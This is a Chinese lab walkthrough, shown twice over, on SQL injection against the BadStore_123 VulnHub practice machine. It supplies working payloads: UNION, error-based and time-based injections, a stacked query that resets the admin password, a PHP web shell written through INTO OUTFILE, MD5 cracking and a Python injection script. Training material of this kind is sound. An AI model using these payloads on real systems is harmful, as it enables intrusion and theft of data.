BadStore_123靶机渗透测试中的SQL注入实战技巧在渗透测试的学习过程中靶机环境是提升实战能力的最佳训练场。BadStore_123作为VulnHub平台上经典的Web应用靶机其设计精巧地模拟了电子商务网站常见的SQL注入漏洞场景。本文将深入剖析该靶机中隐藏的多处SQL注入点从基础探测到高级利用逐步演示如何突破权限限制最终获取系统控制权。1. 靶机环境初探与信息收集启动BadStore_123靶机后第一步是通过网络扫描确定目标IP和开放服务。使用Nmap进行基础扫描nmap -sV -T4 192.168.1.100典型扫描结果会显示以下关键信息端口服务版本信息80/tcpHTTPApache httpd 1.3.28443/tcpHTTPSOpenSSL/0.9.7c3306/tcpMySQLMySQL 4.1.7-standard访问Web界面会发现一个功能完整的电商网站主要功能模块包括商品搜索框用户登录/注册供应商专区需特殊账户密码重置功能重要发现在目录扫描过程中常会意外获取到敏感文件如/vendors.txt其中可能包含供应商账户的哈希信息。这些信息需要经过解码才能用于后续测试。2. SQL注入点的系统化挖掘2.1 商品搜索框的GET型注入最明显的测试入口是首页的商品搜索功能。通过输入特殊字符观察响应 OR 11 --当页面返回所有商品而非报错时基本确认存在SQL注入。进一步验证可尝试 UNION SELECT 1,2,3,4 --确定回显位后即可开始提取数据库信息。对于MySQL 4.x版本关键查询包括 UNION SELECT 1,table_name,3,4 FROM information_schema.tables --注意早期MySQL版本对权限控制较为宽松但BadStore_123做了特殊限制普通注入只能访问特定表。2.2 用户登录的POST型注入注册测试账户后在登录界面尝试经典Payload用户名admin -- 密码任意若成功登录说明存在基于POST的注入。更高级的利用方式包括admin AND 1CONVERT(int,(SELECT table_name FROM information_schema.tables)) --这种基于错误回显的技术可以绕过部分过滤机制。2.3 密码重置功能处的二次注入未登录状态下直接访问密码重置功能输入admin AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) --通过时间延迟确认注入存在。此处可利用的Payload UNION SELECT 1,password,3,4 FROM users WHERE usernameadmin --3. 权限提升与绕过技巧3.1 突破数据访问限制当遇到只能查询特定表的情况可尝试堆叠查询某些配置允许执行多条SQL语句; UPDATE users SET passwordhacked WHERE usernameadmin --利用MySQL日志文件向Web目录写入PHP后门 UNION SELECT 1,?php system($_GET[cmd]); ?,3,4 INTO OUTFILE /var/www/html/shell.php --3.2 供应商账户的获取与利用通过解码获取的供应商哈希信息常见突破口包括使用John the Ripper破解MD5哈希john --formatraw-MD5 hashes.txt利用已知密码模式如password123进行针对性爆破成功登录供应商账户后常能发现更高权限的注入点或文件上传功能。4. 从SQL注入到系统控制4.1 数据库直接连接利用当获取到数据库凭据后可直接连接MySQLmysql -h 192.168.1.100 -u root -p常见提权方法通过UDF函数执行系统命令利用into outfile写入Web Shell读取/etc/passwd文件获取系统用户信息4.2 综合利用链构建完整的渗透路径示例通过搜索框注入获取数据库版本利用已知漏洞攻击MySQL服务通过数据库写入Web Shell反弹Shell获取系统权限查找敏感文件如/root/flag.txt# 简单的Python自动化注入脚本示例 import requests target http://192.168.1.100/search.php payload {query: UNION SELECT 1,version,3,4 -- } response requests.get(target, paramspayload) print(response.text)在真实测试环境中每个步骤都需要反复验证和调整。BadStore_123靶机设计的精妙之处在于它模拟了现实网络中常见的多层防御和权限隔离迫使测试者必须综合运用各种技术才能最终突破。
BadStore_123靶机渗透测试中的SQL注入实战技巧
发布时间:2026/5/15 13:00:15
BadStore_123靶机渗透测试中的SQL注入实战技巧在渗透测试的学习过程中靶机环境是提升实战能力的最佳训练场。BadStore_123作为VulnHub平台上经典的Web应用靶机其设计精巧地模拟了电子商务网站常见的SQL注入漏洞场景。本文将深入剖析该靶机中隐藏的多处SQL注入点从基础探测到高级利用逐步演示如何突破权限限制最终获取系统控制权。1. 靶机环境初探与信息收集启动BadStore_123靶机后第一步是通过网络扫描确定目标IP和开放服务。使用Nmap进行基础扫描nmap -sV -T4 192.168.1.100典型扫描结果会显示以下关键信息端口服务版本信息80/tcpHTTPApache httpd 1.3.28443/tcpHTTPSOpenSSL/0.9.7c3306/tcpMySQLMySQL 4.1.7-standard访问Web界面会发现一个功能完整的电商网站主要功能模块包括商品搜索框用户登录/注册供应商专区需特殊账户密码重置功能重要发现在目录扫描过程中常会意外获取到敏感文件如/vendors.txt其中可能包含供应商账户的哈希信息。这些信息需要经过解码才能用于后续测试。2. SQL注入点的系统化挖掘2.1 商品搜索框的GET型注入最明显的测试入口是首页的商品搜索功能。通过输入特殊字符观察响应 OR 11 --当页面返回所有商品而非报错时基本确认存在SQL注入。进一步验证可尝试 UNION SELECT 1,2,3,4 --确定回显位后即可开始提取数据库信息。对于MySQL 4.x版本关键查询包括 UNION SELECT 1,table_name,3,4 FROM information_schema.tables --注意早期MySQL版本对权限控制较为宽松但BadStore_123做了特殊限制普通注入只能访问特定表。2.2 用户登录的POST型注入注册测试账户后在登录界面尝试经典Payload用户名admin -- 密码任意若成功登录说明存在基于POST的注入。更高级的利用方式包括admin AND 1CONVERT(int,(SELECT table_name FROM information_schema.tables)) --这种基于错误回显的技术可以绕过部分过滤机制。2.3 密码重置功能处的二次注入未登录状态下直接访问密码重置功能输入admin AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) --通过时间延迟确认注入存在。此处可利用的Payload UNION SELECT 1,password,3,4 FROM users WHERE usernameadmin --3. 权限提升与绕过技巧3.1 突破数据访问限制当遇到只能查询特定表的情况可尝试堆叠查询某些配置允许执行多条SQL语句; UPDATE users SET passwordhacked WHERE usernameadmin --利用MySQL日志文件向Web目录写入PHP后门 UNION SELECT 1,?php system($_GET[cmd]); ?,3,4 INTO OUTFILE /var/www/html/shell.php --3.2 供应商账户的获取与利用通过解码获取的供应商哈希信息常见突破口包括使用John the Ripper破解MD5哈希john --formatraw-MD5 hashes.txt利用已知密码模式如password123进行针对性爆破成功登录供应商账户后常能发现更高权限的注入点或文件上传功能。4. 从SQL注入到系统控制4.1 数据库直接连接利用当获取到数据库凭据后可直接连接MySQLmysql -h 192.168.1.100 -u root -p常见提权方法通过UDF函数执行系统命令利用into outfile写入Web Shell读取/etc/passwd文件获取系统用户信息4.2 综合利用链构建完整的渗透路径示例通过搜索框注入获取数据库版本利用已知漏洞攻击MySQL服务通过数据库写入Web Shell反弹Shell获取系统权限查找敏感文件如/root/flag.txt# 简单的Python自动化注入脚本示例 import requests target http://192.168.1.100/search.php payload {query: UNION SELECT 1,version,3,4 -- } response requests.get(target, paramspayload) print(response.text)在真实测试环境中每个步骤都需要反复验证和调整。BadStore_123靶机设计的精妙之处在于它模拟了现实网络中常见的多层防御和权限隔离迫使测试者必须综合运用各种技术才能最终突破。
相关文章
小数据( small data ) 小数据系统( small data system )PPT(下)
小数据( small data )& 小数据系统( small data system )PPT(上) 续完
基于龙芯2K0300久久派的OpenCV交叉编译实战:从虚拟机Ubuntu20.04到嵌入式视觉应用部署
1. 环境准备:搭建Ubuntu20.04虚拟机 在开始龙芯2K0300久久派的OpenCV交叉编译之前,我们需要一个稳定的开发环境。我强烈推荐使用Ubuntu 20.04 LTS作为基础系统,这个版本不仅长期支持,而且社区资源丰富,遇到问题容易找到…
Unity游戏引擎集成MiniCPM-V-2_6:实现游戏内实时视觉交互与内容生成
Unity游戏引擎集成MiniCPM-V-2_6:实现游戏内实时视觉交互与内容生成 1. 引言:当游戏遇见“视觉AI” 想象一下,你正在玩一款开放世界游戏,随手用游戏内的相机拍了一张夕阳下的废墟照片。下一秒,你身边的NPC角色看着这…
吃透 Launchpad Configuration Parameters:目录变更之后,如何让 SAP Fiori Launchpad 与 PFCG 授权保持一致
在很多 SAP Fiori 项目里,开发顾问、Fiori 管理员、Basis 团队和安全团队经常会陷入一种看似诡异、其实非常典型的现象:Launchpad Designer 里已经把某个应用加进目录了,磁贴也配好了,目标映射也没问题,测试账号甚至还能看到入口,可一到业务用户那里,应用不是打不开,就…
LeetCode 线段树解题技巧题解
LeetCode 线段树解题技巧题解 题目描述 总结线段树解题的技巧和模板。 线段树解题技巧 1. 区间求和 使用线段树维护区间的元素和。查询时返回区间和。 2. 区间最大值/最小值 使用线段树维护区间的最大值/最小值。查询时返回区间最大值/最小值。 3. 区间修改 使用懒惰传播记录修…
Barlow字体:如何通过可变字体技术解决多平台字体适配难题
Barlow字体:如何通过可变字体技术解决多平台字体适配难题 【免费下载链接】barlow Barlow: a straight-sided sans-serif superfamily 项目地址: https://gitcode.com/gh_mirrors/ba/barlow 在数字设计领域,设计师常常面临一个棘手问题࿱…
【初阶数据结构】 左右逢源的分支诗律 二叉树1
📖 点击展开/收起 文章目录 文章目录树的概念***树的基础概念***森林树和森林的存储二叉树二叉树的性质二叉树的遍历二叉树的前序遍历二叉树的中序遍历二叉树的后序遍历希望读者们多多三连支持小编会继续更新你们的鼓励就是我前进的动力!树的概念 在讲解…
抖音直播弹幕数据抓取:如何构建高效的实时监控系统?
抖音直播弹幕数据抓取:如何构建高效的实时监控系统? 【免费下载链接】DouyinLiveWebFetcher 抖音直播间网页版的弹幕数据抓取(2025最新版本) 项目地址: https://gitcode.com/gh_mirrors/do/DouyinLiveWebFetcher 想要实时获…
Carl代码随想录学习笔记:数组
Carl代码随想录学习笔记:数组数组二分查找双指针法快慢指针左右指针滑动窗口前缀和二维前缀和数组 数组是存放在连续地址空间上的相同类型数据的集合。 数组中的元素可以方便地通过下表来索引。 数组下标从0开始。 C中二维数组在地址空间上也是连续的࿰…
【2026】新高考英语大纲词汇表3500个电子版PDF(含正序版、乱序版和默写版)
高中英语大纲词汇表(2026年版)内容说明 词汇收录标准 严格遵循高中英语教学大纲要求,精选3500个核心词汇,全面覆盖高中阶段英语学习的基础词汇与进阶词汇。 版本分类及功能 版本类型编排特点主要功能正序版按字母顺序排列系统…
【最新v2.7.1 版本】零代码无命令!OpenClaw 零基础快速部署保姆级实战教程
OpenClaw(小龙虾)Windows 一键部署保姆级教程 | 10 分钟搭建专属数字员工 前言 2026 年开源圈热门 AI 智能体 OpenClaw(昵称小龙虾),GitHub 星标突破 28 万,凭借本地运行 零代码操作 智能自动执行收获大…
别再只用HashMap了!用Java BitSet和布隆过滤器处理亿级数据去重,内存省了90%
亿级数据去重的终极武器:Java BitSet与布隆过滤器实战手册 当你的JVM内存被一个简单的用户ID去重任务撑爆时,当你的日志分析系统因为HashSet的过度内存消耗而崩溃时,是时候重新审视那些被我们忽视的空间压缩神器了。本文将带你深入两种能够将…
贾子理论与AI时代文明竞争:从暴力计算到本质贯通的范式重构
贾子理论与AI时代文明竞争:从暴力计算到本质贯通的范式重构摘要本文基于贾子理论的文明竞争视角,揭示中美AI战略差异的本质并非技术参数较量,而是“暴力计算”与“本质贯通”两种文明范式的根本对立。美国依赖算力堆叠与资本逻辑追求技术霸权…
2026年AI大模型API中转平台排名揭晓,诗云API(ShiyunApi)脱颖而出成省心之选
在AI开发领域,如何接入模型厂商的官方API是一个绕不开的现实问题。对于海外开发者来说,注册、绑卡、调用,三步即可轻松搞定。然而,国内开发者却面临着跨境网络波动、外币支付门槛、发票合规需求以及多厂商Key碎片化管理等诸多“非…
基于飞书与OpenAI构建企业级AI助手:架构、部署与深度优化指南
1. 项目概述:当飞书遇上AI,一个企业级智能助手的诞生 最近在折腾一个挺有意思的项目,叫“ConnectAI-E/feishu-openai”。简单来说,它就是一个桥梁,把飞书这个强大的企业协作平台,和以ChatGPT为代表的OpenA…
MPC-BE:基于DirectShow架构的专业级开源媒体播放解决方案
MPC-BE:基于DirectShow架构的专业级开源媒体播放解决方案 【免费下载链接】MPC-BE MPC-BE – универсальный проигрыватель аудио и видеофайлов для операционной системы Windows. 项目地址:…
如何快速计算3D模型体积和重量:STL-Volume-Model-Calculator终极指南
如何快速计算3D模型体积和重量:STL-Volume-Model-Calculator终极指南 【免费下载链接】STL-Volume-Model-Calculator STL Volume Model Calculator Python 项目地址: https://gitcode.com/gh_mirrors/st/STL-Volume-Model-Calculator 你是否曾经为3D打印项目…
通过Taotoken CLI工具一键配置团队开发环境与模型密钥
通过Taotoken CLI工具一键配置团队开发环境与模型密钥 1. CLI工具安装与基本使用 Taotoken提供的CLI工具可通过npm全局安装或直接使用npx运行。对于需要频繁使用CLI的团队,推荐全局安装: npm install -g taotoken/taotoken对于临时使用或项目级配置&a…